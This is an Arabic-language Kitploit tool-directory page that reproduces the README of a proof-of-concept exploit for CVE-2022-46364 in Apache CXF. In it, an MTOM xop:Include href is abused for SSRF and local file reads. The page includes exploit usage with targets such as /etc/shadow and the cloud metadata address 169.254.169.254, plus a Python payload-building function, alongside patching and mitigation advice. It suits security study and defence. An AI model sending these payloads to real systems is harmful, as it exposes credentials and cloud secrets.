Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-46364-Proof-of-the-concept — تسمح هذه الثغرة الأمنية للمهاجم بتنفيذ هجمات SSRF (تزوير الطلبات من جانب الخادم) على خدمات ويب Apache CXF التي تقبل طلبات MTOM/XOP. تكمن المشكلة في طريقة تحليل السمة href لعنصر xop:Include، مما يسمح للخادم بطلب عناوين URL عشوائية. | Kitploit
أدوات/GitHubGitHub/cybermaksx/cve-2022-46364-proof-of-the-concept
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubcybermaksx/cve-2022-46364-proof-of-the-concept

CVE-2022-46364-Proof-of-the-concept

تسمح هذه الثغرة الأمنية للمهاجم بتنفيذ هجمات SSRF (تزوير الطلبات من جانب الخادم) على خدمات ويب Apache CXF التي تقبل طلبات MTOM/XOP. تكمن المشكلة في طريقة تحليل السمة href لعنصر xop:Include، مما يسمح للخادم بطلب عناوين URL عشوائية.

عرض المستودع
2منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-46364: استغلال Apache CXF MTOM XOP:Include لتحويل SSRF إلى LFI

⚠️ إخلاء المسؤولية

هذه الأداة مخصصة للاختبارات الأمنية التعليمية والمصرح بها فقط

تم توفير هذا الاستغلال كإثبات للمفهوم للأغراض التعليمية لمساعدة المتخصصين في الأمن على فهم الثغرة وحماية أنظمتهم. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. يجب عليك الحصول على إذن كتابي صريح من مالك النظام قبل الاختبار. باستخدامك لهذه الأداة، فإنك توافق على الامتثال لجميع القوانين المعمول بها.


📋 جدول المحتويات

  1. نظرة عامة
  2. تفاصيل الثغرة
  3. الغوص التقني العميق
  4. استخدام الاستغلال
  5. التثبيت والمتطلبات 6 التخفيف
  6. المراجع والاعتمادات

📌 نظرة عامة

السمةالقيمة
معرف CVECVE-2022-46364
معرف GHSAGHSA-x3x3-qwjq-8gj4
نوع الثغرةتزوير الطلبات من جانب الخادم (SSRF) → تضمين الملفات المحلية (LFI)
البرامج المتأثرةApache CXF < 3.5.5, Apache CXF < 3.4.10
الخطورةحرجة
درجة CVSS9.8 (حرجة)
متجه الهجومالشبكة
المصادقةغير مطلوبة
إصدارات التصحيحApache CXF 3.5.5+, 3.4.10+

يستغل هذا الاستغلال ثغرة SSRF حرجة في تنفيذ MTOM (آلية تحسين نقل الرسائل) في Apache CXF لتحقيق تضمين الملفات المحلية (LFI) وإمكانيات فحص الشبكة الداخلية.


🔬 تفاصيل الثغرة

المشكلة الأساسية

يقوم Apache CXF بالتحقق بشكل غير صحيح من سمة href داخل عناصر xop:Include عند معالجة رسائل SOAP المشفرة بـ MTOM. تستخدم المكتبة URLConnection الخاصة بـ Java لفك مرجع URI بدون قيود بروتوكول مناسبة، مما يسمح للمهاجمين بتحديد:

  • file:// - قراءة الملفات المحلية (LFI)
  • http:// / https:// - طلبات الشبكة الداخلية (SSRF)
  • ftp:// - طلبات FTP (قد تؤدي إلى استغلال إضافي)

لماذا تعتبر هذه الثغرة مهمة؟

هذه الثغرة خطيرة بشكل خاص للأسباب التالية:

  1. لا تتطلب مصادقة - يمكن للمهاجمين استهداف أي نقطة نهاية SOAP يمكن الوصول إليها
  2. لا تتطلب امتيازات خاصة - ينفذ الخادم الطلبات بصلاحياته الخاصة
  3. كشف المعلومات - يمكن أن تكشف بيانات وصفية للسحابة (AWS, GCP, Azure) وملفات الإعدادات والكود المصدري
  4. التنقل عبر الشبكة - يتحول الخادم المتأثر إلى وكيل لاستطلاع الشبكة الداخلية

الإعدادات المتأثرة

أي نشر لـ Apache CXF يستوفي الشروط التالية:

  • يقبل رسائل SOAP المشفرة بـ MTOM
  • يحتوي على طريقة خدمة ويب واحدة على الأقل مع معامل (من أي نوع)
  • يستخدم إصدارات أقدم من 3.5.5 (الفرع الرئيسي) أو 3.4.10 (الفرع القديم)

🧠 الغوص التقني العميق

خلفية البروتوكول: MTOM و XOP

MTOM (آلية تحسين نقل الرسائل) هو معيار من W3C لتحسين نقل البيانات الثنائية في رسائل SOAP. يستخدم XOP (التغليف المحسّن للبيانات الثنائية في XML) لتضمين مراجع البيانات الثنائية:

root@kitploit:~
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <myData>
            <xop:Include href="cid:[email protected]" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </myData>
    </soap:Body>
</soap:Envelope>

عادةً، يحتوي href على مرجع CID (معرف المحتوى) إلى جزء MIME. ومع ذلك، تعالج فئة AttachmentUtil في Apache CXF قيم href كعناوين URI عامة دون تطهير مناسب.

مسار الكود القابل للاستغلال

  1. تحليل الطلب:

    • يستقبل CXF طلب HTTP متعدد الأجزاء/مرتبط مع Content-Type: application/xop+xml
    • يعالج AttachmentUtil.getAttachmentObject() عناصر xop:Include
  2. فك مرجع URI:

    • تستدعي الطريقة القابلة للاستغلال new URL(href).openStream() مباشرة
    • لا يحدث أي حظر لبروتوكول file://
    • لا توجد قيود على الشبكة (على سبيل المثال، لا يوجد تحقق من نطاقات IP الداخلية)
  3. تضمين الاستجابة:

    • يتم ترميز المحتوى الذي تم جلبه بـ Base64 وتضمينه في استجابة SOAP
    • يتلقى المهاجم البيانات في مغلف SOAP

مقتطف الكود (النمط القابل للاستغلال)

root@kitploit:~
// Simplified representation of vulnerable code in CXF < 3.5.5
public DataHandler getAttachmentObject(String href) {
    URL url = new URL(href);  // No protocol validation!
    return new DataHandler(url.openStream());
}

لماذا ينجح LFI؟

يتبع بروتوكول file:// نفس مسار الكود:

  • file:///etc/passwd → يقوم Java بفتح /etc/passwd كتدفق ملفات
  • يتم إرجاع محتويات الملف كمرفق
  • لا توجد قيود على نظام الملفات تتجاوز صلاحيات مستخدم عملية CXF

إمكانية فحص الشبكة

من خلال التكرار عبر عناوين IP والمنافذ، يمكن للمهاجمين:

  • اكتشاف الخدمات الداخلية
  • الوصول إلى نقاط نهاية البيانات الوصفية للسحابة (169.254.169.254)
  • تجاوز ضوابط تقسيم الشبكة

🛠️ استخدام الاستغلال

صيغة الأمر

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-e ENDPOINT] [-u URL] [-f FILE] [-s SCAN]

CVE-2022-46364 Apache CXF SSRF to LFI Exploit - Educational Purpose Only

options:
  -h, --help            Show this help message and exit
  -t TARGET, --target TARGET
                        Target base URL (e.g., http://192.168.1.100:8080)
  -e ENDPOINT, --endpoint ENDPOINT
                        Web service endpoint path (default: /services/Service)
  -u URL, --url URL     External URL for SSRF (e.g., http://169.254.169.254/latest/meta-data/)
  -f FILE, --file FILE  Local file path for LFI (e.g., /etc/passwd, C:\\Windows\\win.ini)
  -s SCAN, --scan SCAN  Scan internal network range in CIDR notation (e.g., 192.168.1.0/24)

شرح الوسائط

الوسيطالوصفالمثال
-t, --targetمطلوب. عنوان URL الأساسي لخدمة Apache CXF الهدفhttp://10.10.10.50:8080
-e, --endpointاختياري. مسار نقطة نهاية SOAP/services/UserManagement
-u, --urlعنوان URL بنمط HTTP/HTTPS للجلب عبر SSRFhttp://169.254.169.254/latest/user-data
-f, --fileمسار ملف محلي للقراءة عبر LFI/etc/shadow, C:\ProgramData\secret.txt

📦 التثبيت والمتطلبات

المتطلبات الأساسية

root@kitploit:~
# Python 3.6 or higher required
python --version

خطوات التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/cybermaksxx/CVE-2022-46364-Proof-of-the-concept
cd CVE-2022-46364-PoC

### requirements

requests>=2.28.0 urllib3>=1.26.0

root@kitploit:~

---



### تفاصيل التنفيذ الأساسية

#### 1. بناء حمولة MTOM
```python
def create_mtom_payload(uri):
    """Create a multipart/related MTOM message with xop:Include"""
    soap_part = f"""--MIME_BOUNDARY
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: binary

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <vulnerableParam>
            <xop:Include href="{uri}" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </vulnerableParam>
    </soap:Body>
</soap:Envelope>
--MIME_BOUNDARY--"""
    return soap_part

🛡️ التخفيف

الإصلاح الرسمي

قم بالترقية إلى إصدار مصحح:

root@kitploit:~
<!-- For Maven projects -->
<dependency>
    <groupId>org.apache.cxf</groupId>
    <artifactId>cxf-rt-frontend-jaxws</artifactId>
    <version>3.5.5</version> <!-- or 3.4.10 for legacy -->
</dependency>

الحلول البديلة (إذا لم يكن التصحيح ممكنًا)

  1. تعطيل MTOM كليًا (إذا لم يكن مطلوبًا):

    root@kitploit:~
    <jaxws:endpoint ...>
        <jaxws:properties>
            <entry key="mtom-enabled" value="false"/>
        </jaxws:properties>
    </jaxws:endpoint>
    
  2. ضوابط على مستوى الشبكة:

    • تقييد الاتصالات الصادرة من خادم تطبيق CXF
    • استخدام جدران الحماية لمنع الوصول إلى نطاقات IP الداخلية من طبقة التطبيق
    • تنفيذ تصفية حركة المرور الصادرة
  3. قواعد جدار حماية تطبيقات الويب (WAF):

    • حظر الطلبات التي تحتوي على xop:Include مع href يشير إلى file:// أو عناوين IP داخلية

📚 المراجع والاعتمادات

الباحثون الأصليون

تم اكتشاف هذه الثغرة والإفصاح عنها بمسؤولية بواسطة:

  • Jonathan Leitschuh - باحث أمني
  • Nick Tait - باحث أمني

النشرات الرسمية

  • النشرة الأمنية لـ Apache CXF
  • قاعدة بيانات النشرات الأمنية على GitHub: GHSA-x3x3-qwjq-8gj4
  • NVD: CVE-2022-46364

الموارد ذات الصلة

  • مواصفة MTOM (W3C)
  • مواصفة XOP (W3C)
  • توثيق Apache CXF

الشكر والتقدير

  • فريق Apache CXF لاستجابتهم السريعة وتوفير التصحيح
  • مختبر أمان GitHub لنشر النشرة الأمنية
  • مجتمع الأمن لممارسات الإفصاح المسؤولة

📄 الترخيص

هذه الأداة مقدمة للأغراض التعليمية فقط. الاستخدام غير المصرح به محظور.

root@kitploit:~
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

آخر تحديث: مارس 2026
الإصدار: 1.0
للتواصل: لأي استفسارات أو مخاوف أمنية، يرجى فتح issue على GitHub.


هذا المستند جزء من البحث الأمني المسؤول. احرص دائمًا على الحصول على إذن مناسب قبل الاختبار.

تنزيل الأداة